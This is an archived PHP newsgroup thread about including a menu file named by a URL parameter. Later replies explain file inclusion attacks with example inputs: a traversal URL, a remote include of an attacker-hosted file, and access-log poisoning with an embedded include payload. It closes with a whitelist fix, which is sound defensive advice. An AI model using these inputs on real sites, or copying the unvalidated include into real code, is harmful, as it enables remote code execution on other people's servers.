Hi All
I've tried as many combinations as I can think of but I'm not getting any
where. This is what I have:
<?
$menu = 'menus/' . $HTTP_GET_VARS['menu'] . '.inc';
echo $menu;
?>
I've tried this with the full URL of the inc file as well which just
contains some HTML.
I then have:
<td><?php require'$menu'; ?></td>
I've tried:
<?php require('$menu' ); ?>
<?php require($menu); ?>
<?php require'$menu'; ?>
<?php include('$menu' ); ?>
<?php include($menu); ?>
<?php include'$menu'; ?>
It echoes the $menu string correctly but it either just truncates at <td> or
it displays the rest of the page but I just get <td></td>
Can someone point me in the right direction please.
Best
Andy
9  2292 
Andy Jacobs wrote: Hi All
I've tried as many combinations as I can think of but I'm not getting any
where. This is what I have:
<?
$menu = 'menus/' . $HTTP_GET_VARS['menu'] . '.inc';
echo $menu;
?>
I've tried this with the full URL of the inc file as well which just
contains some HTML.
I then have:
<td><?php require'$menu'; ?></td>
I've tried:
<?php require('$menu' ); ?>
<?php require($menu); ?>
<?php require'$menu'; ?>
<?php include('$menu' ); ?>
<?php include($menu); ?>
<?php include'$menu'; ?>
It echoes the $menu string correctly but it either just truncates at <td> or
it displays the rest of the page but I just get <td></td>
Can someone point me in the right direction please.
Best
Andy
Wow,
No one can say you didn't try! Firstly, don't use HTTP_GET_VARS or the
like as they are depreciated. Use instead the newer $_GET, $_POST, $_SERVER.
The correct what to include/require a file is with require() or
include(). So both the first two requires would work as well as the
first two includes.
I wonder if it's not working because the path is wrong? If you are not
seeing an error, then your error reporting is turned off (as is the
default with newer versions of PHP if I remember correctly). Check out http://us3.php.net/errorfunc and turn on error reporting for now.
HTH,
Joe
In article <8z_%d.4000$%d7 .2439@lakeread0 3>,
Joe Webster <jo*@cawfeemilk .com> wrote: Andy Jacobs wrote: Hi All
I've tried as many combinations as I can think of but I'm not getting any
where. This is what I have:
<?
$menu = 'menus/' . $HTTP_GET_VARS['menu'] . '.inc';
echo $menu;
?>
I've tried this with the full URL of the inc file as well which just
contains some HTML.
I then have:
<td><?php require'$menu'; ?></td>
I've tried:
<?php require('$menu' ); ?>
<?php require($menu); ?>
<?php require'$menu'; ?>
<?php include('$menu' ); ?>
<?php include($menu); ?>
<?php include'$menu'; ?>
It echoes the $menu string correctly but it either just truncates at <td>
or
it displays the rest of the page but I just get <td></td>
Can someone point me in the right direction please.
Best
Andy
Wow,
No one can say you didn't try! Firstly, don't use HTTP_GET_VARS or
the
like as they are depreciated. Use instead the newer $_GET, $_POST, $_SERVER.
The correct what to include/require a file is with require() or
include(). So both the first two requires would work as well as the
first two includes.
I wonder if it's not working because the path is wrong? If you are
not
seeing an error, then your error reporting is turned off (as is the
default with newer versions of PHP if I remember correctly). Check out
http://us3.php.net/errorfunc and turn on error reporting for now.
HTH,
Joe
Remember the old game of mastermind with little pegs? If you do then I
think this was what I was doing. I had one part right and 3 wrong. I
fixed one of the 3 wrong parts and then broke the one right part. One
of these being to actually upload the include files - ooops!
Anyway, thanks for the input. I must get into the habit of user the
newer variables!
Cheers
Andy
Andy Jacobs wrote: In article <8z_%d.4000$%d7 .2439@lakeread0 3>,
Joe Webster <jo*@cawfeemilk .com> wrote:
Andy Jacobs wrote:
Hi All
I've tried as many combinations as I can think of but I'm not getting any
where. This is what I have:
<?
$menu = 'menus/' . $HTTP_GET_VARS['menu'] . '.inc';
echo $menu;
?>
I've tried this with the full URL of the inc file as well which just
contains some HTML.
I then have:
<td><?php require'$menu'; ?></td>
I've tried:
<?php require('$menu' ); ?>
<?php require($menu); ?>
<?php require'$menu'; ?>
<?php include('$menu' ); ?>
<?php include($menu); ?>
<?php include'$menu'; ?>
It echoes the $menu string correctly but it either just truncates at <td>
or
it displays the rest of the page but I just get <td></td>
Can someone point me in the right direction please.
Best
Andy
Wow,
No one can say you didn't try! Firstly, don't use HTTP_GET_VARS or
the
like as they are depreciated. Use instead the newer $_GET, $_POST, $_SERVER.
The correct what to include/require a file is with require() or
include(). So both the first two requires would work as well as the
first two includes.
I wonder if it's not working because the path is wrong? If you are
not
seeing an error, then your error reporting is turned off (as is the
default with newer versions of PHP if I remember correctly). Check out
http://us3.php.net/errorfunc and turn on error reporting for now.
HTH,
Joe
Remember the old game of mastermind with little pegs? If you do then I
think this was what I was doing. I had one part right and 3 wrong. I
fixed one of the 3 wrong parts and then broke the one right part. One
of these being to actually upload the include files - ooops!
Anyway, thanks for the input. I must get into the habit of user the
newer variables!
Cheers
Andy
Gremlins
Andy Jacobs wrote: $menu = 'menus/' . $HTTP_GET_VARS['menu'] . '.inc';
echo $menu;
[snip] <?php require($menu); ?>
Be very careful when doing things like this; if someone can inject a
file with an ".inc" extension somewhere onto your filesystem they can
execute it by calling your script something like this: http://example.com/script.php?menu=....tmp/attack.inc
If there are existing .inc files on the system in known locations, they
can be executed (if PHP) or read (if not PHP) this way even without the
ability to upload files onto the system.
Note that it could be even worse: if you weren't prepending a directory
name, and allow_url_fopen is on (as default) the attacker could specify
a URL to an external web server, executing arbitrary PHP code on your
machine without needing any initial access to lay the attack groundwork.
You should always carefully validate input before using it this way.
-- brion vibber (brion @ pobox.com)
I am having trouble grasping how an attack program would do something
like this. Can anyone give me a better general basic understanding so
that I can more logically avoid the problems it poses when designing my
code?
thanks very much http://example.com/script.php?menu=....tmp/attack.inc
If there are existing .inc files on the system in known locations, they
can be executed (if PHP) or read (if not PHP) this way even without the
ability to upload files onto the system.
Note that it could be even worse: if you weren't prepending a directory
name, and allow_url_fopen is on (as default) the attacker could specify
a URL to an external web server, executing arbitrary PHP code on your
machine without needing any initial access to lay the attack groundwork.
I create, on some web server (not yours) a page called foo.inc. Assume
you weren't prepending a directory name to $menu. When I go to your
page, I go to (supposing the URL after the ? is properly URL-encoded): http://yourdomainname.com/somepage.p...inname.com/foo
Now your page takes that menu parameter, takes the value of it, appends
..inc, and you basically have, in your script:
require("http://mydomainname.co m/foo.inc");
which means that the page living on my server was just executed in the
context of your script (on your server). Who knows what it could do?
The point is you don't know.
In general, I would stay away from including files who's names are
based on parameters from an HTTP request.
Here's my simple solution:
/*
* By defining each acceptable $page value below, you prevent hackers
* including executable code in the URL
*/
$unsecure_pages = array('login',' tos','signup',' copyright','pri vacy');
$secure_pages = array('home','f aq', 'domains');
/* check for login on secure pages here */
<snip>
/* get the include */
$ok_pages = array_merge($un secure_pages, $secure_pages);
if ( in_array ($page, $ok_pages )) {
if(include_once ($tpath . $page . ".inc.php") ) {
echo '';
} else {
die("Property Display Could Not Locate the Page ('$page')");
}
} else {
log_out();
exit;
}
You should also be naming your includes as .php so if someone does get one
to pop up, it gets processed by your server first rather than just showing
all your code which may include passwords and such.
hth,
John
"ZeldorBlat " <ze********@gma il.com> wrote in message
news:11******** **************@ g14g2000cwa.goo glegroups.com.. . I create, on some web server (not yours) a page called foo.inc. Assume
you weren't prepending a directory name to $menu. When I go to your
page, I go to (supposing the URL after the ? is properly URL-encoded):
http://yourdomainname.com/somepage.p...inname.com/foo
Now your page takes that menu parameter, takes the value of it, appends
.inc, and you basically have, in your script:
require("http://mydomainname.co m/foo.inc");
which means that the page living on my server was just executed in the
context of your script (on your server). Who knows what it could do?
The point is you don't know.
In general, I would stay away from including files who's names are
based on parameters from an HTTP request.
"Brion Vibber" <br***@pobox.co m> wrote in message
news:3a******** *****@individua l.net... Andy Jacobs wrote: $menu = 'menus/' . $HTTP_GET_VARS['menu'] . '.inc';
echo $menu;
[snip] <?php require($menu); ?>
Be very careful when doing things like this; if someone can inject a
file with an ".inc" extension somewhere onto your filesystem they can
execute it by calling your script something like this:
http://example.com/script.php?menu=....tmp/attack.inc
The attacker could just inject PHP code into the Apache access log by going
to links in the form of http://www.dingo.net/<?include('http ://...')?>, then
make PHP include the access log. It might take a while to parse but
eventually PHP would execute the statement.
Tex John wrote: You should also be naming your includes as .php so if someone does get one
to pop up, it gets processed by your server first rather than just showing
all your code which may include passwords and such.
A warning is in order here, though: you need to code on the assumption
that any of your .php files can be directly executed, so you need to
make sure they are individually safe to run. Consider output, filesystem
or database side effects, use of global variables (register_globa ls
vulnerabilities ), etc.
One very simple way is to only have known entry point scripts with
actual runnable code, and have all others be function and class
declarations only.
It's safer still to keep your include files outside of the web server's
document root; you can set PHP's include_path for convenience.
-- brion vibber (brion @ pobox.com) This thread has been closed and replies have been disabled. Please start a new discussion. Similar topics | |
by: Cartensy |
last post by:
Hi, I try to configure a php applic to load a config file (the purpose is to
use in all the php pages variables definied in a config file)
Here is a small example which describe my problem:
My config file (test_config.php)
<?
$FOO=1;
print "IN REQUIRE FILE: $FOO\n";
?>
|
by: Zaan |
last post by:
www.entropy.ch release for Mac OS
X.]
Hello,
My issue is the following: to promote consistency on a site I'm
building, I decided to go for a php scheme where some recurring
elements (navigation, mostly) are written in a file of their own, which
would then get called from each file needing it by the function
require(). The following example may make this clear (the HTML is
|
by: james |
last post by:
I can't seem to access sessions variables from include files.
If I use the include file like this it I cant get the session
variables:
<?php
session_start();
require("url/to/inc/file.php");
?>
If I enter the url to the include file in my address bar, I can get
|
by: Sean Pinto |
last post by:
Ok, you all are going to have to bear with me on this one as it is
kinda complicated to explain. I am implementing a company management
suite that requires Role-Based authentiations (ie. users are in groups
and groups have roles). I have one script which is included in EVERY
page in the protected area (masterFuncs.php) and it contains function
declarations as well as the authentication module kick-off. Here is a
snippet from masterFuncs...
|
by: Will |
last post by:
I know I am searching using the wrong words because I can't seem to find
a simple answer on this. Here's what I want to do.
helper.inc
<!php
var $fileName2;
class helper {
function funcOne($fileName) {
| | |
by: Mike |
last post by:
I'm new to PHP - moving over from ASP.
I have a number of include files, the first of which sets the value of
a variable $loginmsg. I use that variable in a subsequent include
file, but get a "Notice: Undefined variable loginmsg" warning. I've
had a good look at previous posts concerning this warning, and see that
isset() is recommended to prevent this kind of warning. Is this
totally necessary?
In ASP, and include file becomes...
|
by: Bob Bedford |
last post by:
HI all,
Weird problem....
in the file queries.inc.php I've this:
$query = 'select * from list where content = '.$idcontent;
I've this code in my page:
$idcontent = 15;
require_once("queries.inc.php");
|
by: SoulIntruder |
last post by:
Hello folks.
I have a beginners question.
I have such script:
<?php
$User = $_POST;
$Password = $_POST;
$Database = $_POST;
|
by: Mark |
last post by:
so, i'm making a website. let's say i have header.php, footer.php and
content.php.
now in index.php I simply want to include the 3 pages. easy enough to
do.
but let's say the user navigates to mysite.com/content.php. now the
header and footer will appear to be missing.
so now the question is, how can i include the header and footer in
content.php only if the page isn't already nested?
|
by: marktang |
last post by:
ONU (Optical Network Unit) is one of the key components for providing high-speed Internet services. Its primary function is to act as an endpoint device located at the user's premises. However, people are often confused as to whether an ONU can Work As a Router. In this blog post, we’ll explore What is ONU, What Is Router, ONU & Router’s main usage, and What is the difference between ONU and Router. Let’s take a closer look !
Part I. Meaning of...
|
by: Hystou |
last post by:
Most computers default to English, but sometimes we require a different language, especially when relocating. Forgot to request a specific language before your computer shipped? No problem! You can effortlessly switch the default language on Windows 10 without reinstalling. I'll walk you through it.
First, let's disable language synchronization. With a Microsoft account, language settings sync across devices. To prevent any complications,...
| | |
by: jinu1996 |
last post by:
In today's digital age, having a compelling online presence is paramount for businesses aiming to thrive in a competitive landscape. At the heart of this digital strategy lies an intricately woven tapestry of website design and digital marketing. It's not merely about having a website; it's about crafting an immersive digital experience that captivates audiences and drives business growth.
The Art of Business Website Design
Your website is...
|
by: Hystou |
last post by:
Overview:
Windows 11 and 10 have less user interface control over operating system update behaviour than previous versions of Windows. In Windows 11 and 10, there is no way to turn off the Windows Update option using the Control Panel or Settings app; it automatically checks for updates and installs any it finds, whether you like it or not. For most users, this new feature is actually very convenient. If you want to control the update process,...
|
by: agi2029 |
last post by:
Let's talk about the concept of autonomous AI software engineers and no-code agents. These AIs are designed to manage the entire lifecycle of a software development project—planning, coding, testing, and deployment—without human intervention. Imagine an AI that can take a project description, break it down, write the code, debug it, and then launch it, all on its own....
Now, this would greatly impact the work of software developers. The idea...
|
by: conductexam |
last post by:
I have .net C# application in which I am extracting data from word file and save it in database particularly. To store word all data as it is I am converting the whole word file firstly in HTML and then checking html paragraph one by one.
At the time of converting from word file to html my equations which are in the word document file was convert into image.
Globals.ThisAddIn.Application.ActiveDocument.Select();...
|
by: TSSRALBI |
last post by:
Hello
I'm a network technician in training and I need your help.
I am currently learning how to create and manage the different types of VPNs and I have a question about LAN-to-LAN VPNs.
The last exercise I practiced was to create a LAN-to-LAN VPN between two Pfsense firewalls, by using IPSEC protocols.
I succeeded, with both firewalls in the same network. But I'm wondering if it's possible to do the same thing, with 2 Pfsense firewalls...
|
by: 6302768590 |
last post by:
Hai team
i want code for transfer the data from one system to another through IP address by using C# our system has to for every 5mins then we have to update the data what the data is updated we have to send another system
| | |
by: muto222 |
last post by:
How can i add a mobile payment intergratation into php mysql website.
| |
